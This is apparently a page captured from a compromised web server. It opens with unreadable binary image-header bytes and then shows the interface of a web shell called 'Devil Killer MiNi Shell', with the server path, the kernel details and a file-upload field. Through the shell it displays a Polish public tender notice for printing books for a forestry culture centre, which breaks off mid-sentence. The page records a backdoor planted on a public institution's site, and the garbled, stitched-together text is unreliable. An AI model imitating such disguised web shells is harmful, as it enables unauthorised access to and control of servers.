JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221028/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221028/0041605001-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> ,,Przygotowanie do druku i druk publikacji oraz informatorów wraz z dostawą do siedziby Zamawiającego poszczególnych części zamówienia” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">OŚRODEK KULTURY LEŚNEJ W GOŁUCHOWIE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 250518105</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Jana i Izabeli Działyńskich 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gołuchów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">63-322</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL416 - Kaliski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">62 761 50 45</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">biuro@okl.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.okl.lasy.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Leśnictwo </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> ,,Przygotowanie do druku i druk publikacji oraz informatorów wraz z dostawą do siedziby Zamawiającego poszczególnych części zamówienia” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-0d9705f5-56af-11ed-8832-4e4740e186ac</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00416050</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-10-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00211897/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.3 Przygotowanie do druku i druk publikacji oraz informatorów wraz z dostawą do siedziby Zamawiającego poszczególnych części zamówienia</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/lasy_okl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/lasy_okl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne<br/>wysyłania i odbierania dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu<br/>opisane zostały w regulaminie korzystania z platformazakupowa.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Stosownie do art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych osobowych)(Dz. Urz. UE L119 z 04 maja 2016 r., str. 1 –<br/>„RODO”) Zamawiający informuje, iż administratorem danych osobowych<br/>jest Skarb Państwa – Państwowe Gospodarstwo Leśne Lasy Państwowe - Ośrodek Kultury Leśnej w<br/>Gołuchowie, ul. Działyńskich 2,63-322 Gołuchów, tel.:627615045, e-mail: okl@okl.lasy.gov.pl,<br/>reprezentowany przez Dyrektora Ośrodka Kultury Leśnej w Gołuchowie.<br/>Administrator informuje, iż wyznaczył Inspektora Ochrony Danych Osobowych w osobie p. Sławomir<br/>Zieliński , z którym w sprawach dotyczących przetwarzania danych osobowych można skontaktować<br/>się za pośrednictwem poczty elektronicznej pod adresem e-mail slawomir.zielinski@okl.lasy.gov.pl lub<br/>telefonicznie pod numerem tel. 627615045.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DZ.270.3.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">7</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Usługa przygotowania do druku, druku, oprawy i dostawy rocznika naukowego „Studia i Materiały Ośrodka Kultury Leśnej” t. 21 - przygotowanie projektu graficznego okładki i wnętrza książki odpowiadającego tomowi 20 „Studiów i Materiałów Ośrodka Kultury Leśnej”<br/>- wykonanie redakcji i korekty tekstów,<br/>- przeprowadzenie korekty autorskiej (wysłanie poszczególnych artykułów w formie przygotowanej do druku jako pliki PDF do Ośrodka Kultury Leśnej, który po konsultacjach z autorami będzie przekazywał uwagi i zatwierdzał wersję do druku)<br/>- przygotowanie rycin do druku<br/>- skład i łamanie i przygotowanie plików drukarskich<br/>5<br/>- korekta techniczna po składzie<br/>- przygotowanie wersji ostatecznej i kompletnej w formacie PDF dla Zamawiającego<br/>- format: B5 (pion)<br/>- objętość: ok. 18 ark. wyd. tekstu (w tym tabele i wykresy) + ok. 130 rycin kolorowych na wkładkach<br/>- książka zawiera artykuły różnych autorów (15), w przypadku kilku artykułów po tekście występują strony ze zdjęciami tzw. wkładki<br/>- wkładki, łącznie ok. 70 stron;<br/>- druk: tekst czarno-biały, strony zawierające zdjęcia (wkładki) – pełny kolor;<br/>- przewidywana czcionka w publikacji Minion Pro 11<br/>- wnętrze: papier offsetowy 80 g/m2<br/>- wkładki: papier kredowy 130 g/m2<br/>- okładka barwna: karton 250 g/m2, folia matowa<br/>- oprawa: klejona (klej PUR), broszurowa<br/>- dostawa wydrukowanych książek do siedziby Zamawiającego<br/>- nakład: 800 egz.<br/>- publikacja z numerem ISBN </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79800000-2 - Usługi drukowania i powiązane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">79823000-9 - Usługi drukowania i dostawy</p> <p class="mb-0">79822500-7 - Usługi projektów graficznych</p> <p class="mb-0">79822000-2 - Usługi składu</p> <p class="mb-0">79821100-6 - Usługi korektorskie</p> <p class="mb-0">22100000-1 - Drukowane książki, broszury i ulotki</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty, Zamawiający będzie się kierował następującymi kryteriami i ich wagami:<br/>1) C – Cena – 60%.<br/>Ocena ofert w przedmiotowym kryterium zostanie dokonana wg wzoru:<br/>C= (Cmin/Cx)*60 pkt<br/>gdzie:<br/>C- liczba punktów jakie otrzyma oferta &#34;x&#34;<br/>Cmin - najniższa cena spośród wszystkich ważnych i nieodrzuconych ofert<br/>Cx- cena oferty badanej &#34;x&#34;<br/><br/>Najdłuższy możliwy termin wykonania wymagany przez Zamawiającego od dnia dostarczenia przez Zamawiającego wszystkich niezbędnych materiałów (warunek konieczny) - 14 dni,<br/>- za zaproponowanie terminu realizacji 14 dni – 0 pkt,<br/>- za zaproponowanie terminu realizacji 13-12 dni – 10 pkt,<br/>- za zaproponowanie terminu realizacji 11-10 dni – 20 pkt,<br/>- za zaproponowanie terminu realizacji 9-8 dni – 30 pkt,<br/>- za zaproponowanie terminu realizacji 7dni i mniej – 40 pkt<br/><br/>Termin realizacji należy podawać w pełnych dniach od dnia dostarczenia przez Zamawiającego wszystkich niezbędnych materiałów.<br/>Ocena zostanie dokonana na podstawie wskazanych przez Wykonawcę w ofercie terminów realizacji zamówienia.<br/><br/>Za najkorzystniejszą zostanie uznana oferta z największą ilością punktów, stanowiących sumę punktów przyznanych w każdym kryterium obliczonych wg wzoru:<br/>gdzie:<br/>P = C+T<br/>14<br/>C - liczba punktów przyznana ofercie ocenianej w kryterium „Cena&#34;,<br/>T - łączna liczba punktów przyznana w kryterium „Termin realizacji zamówienia&#34;. P - łączna liczba punktów przyznana ofercie ocenianej w obydwu kryteriach.<br/><br/>Punkty są zaokrąglane do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Najdłuższy możliwy termin wykonania wymagany przez Zamawiającego od dnia dostarczenia przez Zamawiającego wszystkich niezbędnych materiałów</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Usługa opracowania graficznego, przygotowania do druku, druku, oprawy i dostawy książki „Polowactwo, czyli myślistwo tatrzańskie” - przygotowanie projektu graficznego okładki i wnętrza książki i przedstawienie do konsultacji Zamawiającemu<br/>- przeprowadzenie korekty autorskiej (wysłanie materiału w formie przygotowanej do druku jako plik PDF do Zamawiającego, który po konsultacji z autorem przekaże uwagi i będzie zatwierdzał wersję do druku)<br/>- współpraca z osobą redagująca i przeprowadzającą korektę (wskazaną przez Zamawiającego do kontaktu) w zakresie wprowadzania zmian<br/>- przygotowanie rycin do druku<br/>- skład i łamanie i przygotowanie plików drukarskich<br/>- przygotowanie ostatecznej i kompletnej wersji w formacie PDF dla Zamawiającego<br/>- format: B5 (pion)<br/>- objętość: ok. 690 tys. znaków ze spacjami (tekst, podpisy pod zdjęcia, literatura) + 132 ryciny<br/>kolorowe umieszczone w tekście.<br/>- druk: 4 + 4<br/>- wnętrze: papier amber graphic 100 g/m2,<br/>- okładka barwna: karton 250 g/m2, folia matowa<br/>- oprawa: klejona (klej PUR), broszurowa<br/>- dostawa wydrukowanych książek do siedziby Zamawiającego<br/>- nakład: 300 egz.<br/>- publikacja z numerem ISBN. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79800000-2 - Usługi drukowania i powiązane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">79823000-9 - Usługi drukowania i dostawy</p> <p class="mb-0">79822500-7 - Usługi projektów graficznych</p> <p class="mb-0">79822000-2 - Usługi składu</p> <p class="mb-0">79821100-6 - Usługi korektorskie</p> <p class="mb-0">22100000-1 - Drukowane książki, broszury i ulotki</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-20</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty, Zamawiający będzie się kierował następującymi kryteriami i ich wagami:<br/>1) C – Cena – 60%.<br/>Ocena ofert w przedmiotowym kryterium zostanie dokonana wg wzoru:<br/>C= (Cmin/Cx)*60 pkt<br/>gdzie:<br/>C- liczba punktów jakie otrzyma oferta &#34;x&#34;<br/>Cmin - najniższa cena spośród wszystkich ważnych i nieodrzuconych ofert<br/>Cx- cena oferty badanej &#34;x&#34;<br/><br/>Najdłuższy możliwy termin wykonania wymagany przez Zamawiającego od dnia dostarczenia przez Zamawiającego wszystkich niezbędnych materiałów (warunek konieczny) - 30 dni,<br/>- za zaproponowanie terminu realizacji 30 dni – 0 pkt,<br/>- za zaproponowanie terminu realizacji 25-29 dni – 10 pkt,<br/>- za zaproponowanie terminu realizacji 20-24 dni – 20 pkt,<br/>- za zaproponowanie terminu realizacji 15-19 dni – 30 pkt,<br/>- za zaproponowanie terminu realizacji 14 dni i mniej – 40 pkt<br/><br/>Termin realizacji należy podawać w pełnych dniach od dnia dostarczenia przez Zamawiającego wszystkich niezbędnych materiałów.<br/>Ocena zostanie dokonana na podstawie wskazanych przez Wykonawcę w ofercie terminów realizacji zamówienia.<br/><br/>Za najkorzystniejszą zostanie uznana oferta z największą ilością punktów, stanowiących sumę punktów przyznanych w każdym kryterium obliczonych wg wzoru:<br/>gdzie:<br/>P = C+T<br/>14<br/>C - liczba punktów przyznana ofercie ocenianej w kryterium „Cena&#34;,<br/>T - łączna liczba punktów przyznana w kryterium „Termin realizacji zamówienia&#34;. P - łączna liczba punktów przyznana ofercie ocenianej w obydwu kryteriach.<br/><br/>Punkty są zaokrąglane do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Najdłuższy możliwy termin wykonania wymagany przez Zamawiającego od dnia dostarczenia przez Zamawiającego wszystkich niezbędnych materiałów</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Usługa opracowania graficznego, przygotowania do druku, druku, oprawy i dostawy książki „Dzieci wojny. Historie prawdziwe. Ocalić od zapomnienia” - przygotowanie wydania drugiego, rozszerzonego - pierwsze wydanie dostępne jako pliki pdf - przeprowadzenie redakcji i korekty całego materiału - przeprowadzenie korekty autorskiej (wysłanie materiału w formie przygotowanej do druku jako plik PDF do Zamawiającego, który po konsultacji z autorem przekaże uwagi i będzie zatwierdzał wersję do druku) - przygotowanie rycin do druku<br/>6<br/>- skład i łamanie i przygotowanie plików drukarskich - przygotowanie ostatecznej i kompletnej wersji w formacie PDF dla Zamawiającego - format: B5 (pion) - objętość: ok. 360 stron - druk: 4 + 4 - wnętrze: papier amber graphic 100 g/m2, - okładka barwna: karton 250 g/m2, folia matowa - oprawa: klejona (klej PUR), broszurowa - dostawa wydrukowanych książek do siedziby Zamawiającego - nakład: 1000 egz. - publikacja z numerem ISBN </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79800000-2 - Usługi drukowania i powiązane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">79823000-9 - Usługi drukowania i dostawy</p> <p class="mb-0">79822500-7 - Usługi projektów graficznych</p> <p class="mb-0">79822000-2 - Usługi składu</p> <p class="mb-0">79821100-6 - Usługi korektorskie</p> <p class="mb-0">22100000-1 - Drukowane książki, broszury i ulotki</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-20</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty, Zamawiający będzie się kierował następującymi kryteriami i ich wagami:<br/>1) C – Cena – 60%.<br/>Ocena ofert w przedmiotowym kryterium zostanie dokonana wg wzoru:<br/>C= (Cmin/Cx)*60 pkt<br/>gdzie:<br/>C- liczba punktów jakie otrzyma oferta &#34;x&#34;<br/>Cmin - najniższa cena spośród wszystkich ważnych i nieodrzuconych ofert<br/>Cx- cena oferty badanej &#34;x&#34;<br/><br/>Najdłuższy możliwy termin wykonania wymagany przez Zamawiającego od dnia dostarczenia przez Zamawiającego wszystkich niezbędnych materiałów (warunek konieczny) - 30 dni,<br/>- za zaproponowanie terminu realizacji 30 dni – 0 pkt,<br/>- za zaproponowanie terminu realizacji 25-29 dni – 10 pkt,<br/>- za zaproponowanie terminu realizacji 20-24 dni – 20 pkt,<br/>- za zaproponowanie terminu realizacji 15-19 dni – 30 pkt,<br/>- za zaproponowanie terminu realizacji 14 dni i mniej – 40 pkt<br/><br/>Termin realizacji należy podawać w pełnych dniach od dnia dostarczenia przez Zamawiającego wszystkich niezbędnych materiałów.<br/>Ocena zostanie dokonana na podstawie wskazanych przez Wykonawcę w ofercie terminów realizacji zamówienia.<br/><br/>Za najkorzystniejszą zostanie uznana oferta z największą ilością punktów, stanowiących sumę punktów przyznanych w każdym kryterium obliczonych wg wzoru:<br/>gdzie:<br/>P = C+T<br/>14<br/>C - liczba punktów przyznana ofercie ocenianej w kryterium „Cena&#34;,<br/>T - łączna liczba punktów przyznana w kryterium „Termin realizacji zamówienia&#34;. P - łączna liczba punktów przyznana ofercie ocenianej w obydwu kryteriach.<br/><br/>Punkty są zaokrąglane do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Najdłuższy możliwy termin wykonania wymagany przez Zamawiającego od dnia dostarczenia przez Zamawiającego wszystkich niezbędnych 